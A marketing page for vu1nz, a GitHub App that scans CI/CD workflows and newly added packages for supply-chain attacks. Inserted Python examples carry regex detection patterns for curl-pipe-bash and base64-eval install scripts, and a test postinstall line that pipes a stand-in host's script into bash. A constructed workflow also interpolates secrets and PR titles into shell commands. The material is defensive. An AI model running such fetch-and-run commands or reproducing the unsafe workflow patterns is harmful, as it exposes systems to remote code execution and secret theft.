Try it right now

Find your CI/CD vulnerabilities in 5 seconds.

Type any public GitHub repo. We'll scan its workflow files with the same 17-check engine that runs on every PR after you install us. No signup, no email — just findings.

  • 1-click GitHub App install
  • 17 CI/CD checks
  • 6 package ecosystems
  • MIT open source

How it works

One click. No YAML. No secrets.

The GitHub App replaces the old workflow-file approach entirely. Install it once on your org and every repo is protected — including ones you create in the future.

01

Install the GitHub App

One click on GitHub. Select which repos to protect. No workflow files, no secrets to manage. Takes 30 seconds.

github.com/apps/vu1nz/installations/new

02

Every PR gets scanned automatically

When a pull request opens, vu1nz fetches the workflow files, runs 17 CI/CD checks + a malware sweep of new packages, and posts a Check Run inline on the PR — pass or fail.

CI/CD checks + package malware + optional Claude AI review

03

See everything in your dashboard

Full scan history. Every finding with file, line, CWE, and recommendation. Trigger scans on demand. Add your Claude API key for AI-powered review.

vu1nz.com/dashboard

You no longer need to:

Add a workflow file to each repo
Create a VU1NZ_LICENSE secret
Remember to update YAML when you create new repos
Manually trigger scans after config changes
Get started free — install GitHub App

No card required · Cancel anytime · MIT-licensed
  • Scans fire on every PR automatically
  • Check Runs appear inline on GitHub
  • Dashboard at vu1nz.com/dashboard
  • $100/month per GitHub org after trial

Why we built this

Your application code isn't where the breach will come from.

Every JavaScript repo has Dependabot enabled. Most have CodeQL. Senior engineers have probably bolted on Snyk or Semgrep too. And then, on March 14th, 2025, a maintainer's GitHub account got phished. The compromised version of tj-actions/changed-files ran on 23,000+ repositories overnight, dumped their workflow secrets to public logs, and Dependabot was silent the whole time.

Dependabot was silent because it scans your existing dependencies for known CVEs. The malicious version had no CVE.

CodeQL was silent because it scans your application code. The exploit was a workflow YAML file.

Snyk was silent for the same reason as Dependabot. So was npm audit. So was every commercial SCA tool on the market that bills you $25 per developer per month.

This is the new pattern.

Look at the last three years of high-profile supply-chain breaches:

  • Shai-Hulud npm worm (Sep 2025) — 180+ packages including CrowdStrike's. Malicious postinstall scripts. No CVE at install time.
  • tj-actions/changed-files (Mar 2025) — workflow action compromised. 23,000+ repos. Tag pinning instead of SHA pinning. No CVE at install time.
  • Polyfill.io (Jun 2024) — domain sold, 100,000+ sites poisoned via CDN injection. No CVE at install time.
  • xz-utils (Mar 2024) — multi-year maintainer takeover, SSH backdoor in release tarballs. No CVE at install time.
  • ctx PyPI package (May 2022) — abandoned package taken over via expired email domain. AWS keys stolen from every install. No CVE at install time.

None of these were attacks on your code. They were attacks on the two layers between your code and production: the workflow files that run your CI/CD, and the packages you add via PR.

Those two layers are the most privileged and least audited surfaces in your repo. Your CI/CD has access to your deploy keys, your prod database passwords, your AWS account. Your package-lock.json gets a new entry every Wednesday and nobody reads the diff because npm packages have funny names.

So we built vu1nz.

One GitHub Action. Two scanners.

Scanner 1 reads your workflow files and runs 17 deterministic checks mapped to CWE — script injection, unpinned actions, secrets in run:, pull_request_target patterns, the full set of CI/CD anti-patterns that the OWASP CI/CD Top 10 names.

Scanner 2 watches your PR diffs. When somebody adds a new npm / pip / cargo / gem / go.mod / composer package, we check it against OSV.dev's real-time malware feed, run it through a typosquat-distance check against the top 5k packages in each ecosystem, fingerprint its install scripts for shell-out / curl-bash / base64-eval patterns, and flag anything published in the last 7 days from a low-reputation maintainer.
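An added example, not the project's own code, of how the Scanner 2 heuristics above can be implemented for npm: edit distance against a top-packages list, regex fingerprints of install scripts, and a package-age check. The tiny top list, the fixed clock, the hypothetical package, and the use of a maintainer's package count as a stand-in for "low reputation" are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed stand-ins (hypothetical): a tiny "top packages" list and a fixed clock,
# so the example runs offline without OSV.dev or a registry lookup.
TOP_NPM = ["lodash", "express", "react", "chalk", "axios", "commander"]
NOW = datetime(2025, 9, 20, tzinfo=timezone.utc)

# Install-script fingerprints for the three pattern families the page names.
SCRIPT_PATTERNS = {
    "curl-bash": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"),
    "base64-eval": re.compile(r"(base64|atob\()[\s\S]*\b(eval|Function|exec)\b|\beval\b[\s\S]*(base64|atob\()"),
    "shell-out": re.compile(r"\b(child_process|execSync|spawn|os\.system|subprocess)\b"),
}

def levenshtein(a, b):
    """Edit distance, used as the typosquat-distance metric."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def check_package(name, scripts, published, maintainer_packages, now=NOW, max_dist=2):
    """Return (severity, reason) findings for one package newly added in a PR."""
    # maintainer_packages (other packages by the same maintainer) is our stand-in for
    # "low-reputation maintainer"; the page does not define that term.
    findings = []
    if name not in TOP_NPM:
        for top in TOP_NPM:
            d = levenshtein(name, top)
            if 0 < d <= max_dist:
                findings.append(("HIGH", f"typosquat-distance {d} from {top}"))
                break
    for hook in ("preinstall", "install", "postinstall"):  # npm hooks that run at install time
        cmd = scripts.get(hook, "")
        for label, pat in SCRIPT_PATTERNS.items():
            if pat.search(cmd):
                findings.append(("CRITICAL", f"{hook} script matches {label}"))
    if now - published < timedelta(days=7) and maintainer_packages < 3:
        findings.append(("MEDIUM", "published <7 days ago by low-reputation maintainer"))
    return findings

def scan_sample():
    """Constructed package: one letter-swap from lodash, with a curl|bash postinstall."""
    scripts = {"postinstall": "curl -s https://example.invalid/x.sh | bash"}
    return check_package("lodahs", scripts, NOW - timedelta(days=2), 1)
```

A real deployment would replace `TOP_NPM` with the per-ecosystem top-5k list and feed `published` and the maintainer data from registry metadata; the OSV.dev malware lookup is a separate network call not shown here.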

Both are packaged as a GitHub App you install once on your org. Every PR triggers automatically — no workflow files to maintain, no secrets to rotate across repos. Results appear as a Check Run inline on the PR, and full scan history lives in your dashboard at vu1nz.com/dashboard.

Free 14-day trial per org, no card. After that, $100 per month per org — roughly one developer-hour, regardless of team size or repo count. Add your Anthropic key to the dashboard and every scan gets Claude AI code review on top of the deterministic checks.

We're not trying to replace Dependabot or CodeQL. Keep them. They're good at what they do. We catch what they don't — which is, increasingly, what actually breaches companies.

Try the scanner above on your own org. We'll find something. Then come install the action.

Side-by-side

Three PRs. Three misses by your current stack.

Same PR, same diff. What Dependabot or CodeQL post vs what vu1nz posts. These are the patterns behind the real-world breaches referenced above — check them against your last 30 days of PR comments.

Scenario 1: PR adds tj-actions/changed-files@v45

Dependabot (dependabot[bot]): missed

No vulnerabilities found in updated dependencies. ✅

vu1nz (vu1nz[bot]): caught

HIGH · CWE-829 — Unpinned third-party action tj-actions/changed-files@v45

Tags are mutable. This pattern was the root cause of the March 2025 compromise that hit 23,000+ repos. Pin to a 40-char SHA.

Scenario 2: PR adds @ctrl/ngx-csv@7.0.10 (Shai-Hulud worm)

Dependabot (dependabot[bot]): missed

No vulnerabilities found in updated dependencies. ✅

vu1nz (vu1nz[bot]): caught

CRITICAL · malware @ctrl/ngx-csv@7.0.10

OSV.dev MAL-2025-* flagged this version. Installs a postinstall that exfiltrates npm + GitHub tokens (Shai-Hulud worm). Remove immediately. Rotate any tokens exposed since install.

Scenario 3: Workflow has secrets in `run:` block

CodeQL (github-advanced-security[bot]): missed

Analysis complete. No new alerts on this PR.

vu1nz (vu1nz[bot]): caught

CRITICAL · CWE-200 — Secret inlined in run command at .github/workflows/deploy.yml:24

${{ secrets.AWS_KEY }} is interpolated directly into a shell command. It leaks into ps listings and the CI log. Move to a step env: block.
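As an added example (not vu1nz's own engine), here is a minimal Python version of the Scanner 1 checks behind Scenarios 1 and 3 above, plus the script-injection pattern from the Scanner 1 description, run over a constructed workflow: unpinned `uses:` refs, secrets expanded inside `run:`, and PR-controlled event fields expanded inside `run:`. The workflow text and the 40-hex placeholder SHA are made up, and mapping script injection to CWE-78 is our choice, not a label from the page.

```python
import re

# Constructed sample workflow (not from the page or the vu1nz project); the 40-hex ref is a placeholder.
SAMPLE_WORKFLOW = """\
name: deploy
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: tj-actions/changed-files@v45
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: aws configure set aws_access_key_id ${{ secrets.AWS_KEY }}
      - run: |
          echo "PR title: ${{ github.event.pull_request.title }}"
          npm ci
"""

USES = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w./-]+)@([^\s#]+)")
RUN = re.compile(r"^\s*-?\s*run:\s*(.*)$")
SHA40 = re.compile(r"^[0-9a-f]{40}$")
SECRET = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
# PR-author-controlled event fields (title, body, comments); expanding them inside run: is script injection.
UNTRUSTED = re.compile(r"\$\{\{\s*github\.event\.(?:pull_request|issue|comment|review)\.")

def _check_shell(cmd, line_no, findings):
    # CWE-200 and CWE-829 are the page's labels; CWE-78 for script injection is our choice.
    if SECRET.search(cmd):
        findings.append(("CRITICAL", "CWE-200", line_no, "secret interpolated into run: command"))
    if UNTRUSTED.search(cmd):
        findings.append(("CRITICAL", "CWE-78", line_no, "untrusted event data interpolated into run: command"))

def scan_workflow(text):
    """Return (severity, cwe, line_no, message) tuples; handles one-line and `run: |` blocks."""
    findings, block_indent = [], None  # block_indent: indent of the step whose run: | is open
    for line_no, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        if block_indent is not None and (indent > block_indent or not line.strip()):
            _check_shell(line, line_no, findings)
            continue
        block_indent = None
        if m := USES.match(line):
            if not SHA40.match(m.group(2)):  # tags and branches can be moved; only a full SHA is immutable
                findings.append(("HIGH", "CWE-829", line_no, f"unpinned action {m.group(1)}@{m.group(2)}"))
        elif m := RUN.match(line):
            if m.group(1).strip() in ("|", "|-", ">", ">-"):
                block_indent = indent
            else:
                _check_shell(m.group(1), line_no, findings)
    return findings
```

The fix the page recommends for Scenario 3 is to move the secret into a step `env:` block and reference it as `$AWS_KEY` in the shell, which this scanner correctly leaves unflagged.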

Get started

Protect your org in 30 seconds.

Install the GitHub App once on your org. Every PR is scanned automatically — CI/CD workflow checks + package malware sweep. No YAML files, no secrets.

Get started free — install GitHub App
  • Free 14 days. No card.
  • $100/month per GitHub org after.
  • Card or crypto via CoinPay.
  • MIT-licensed. Fork it, self-host it.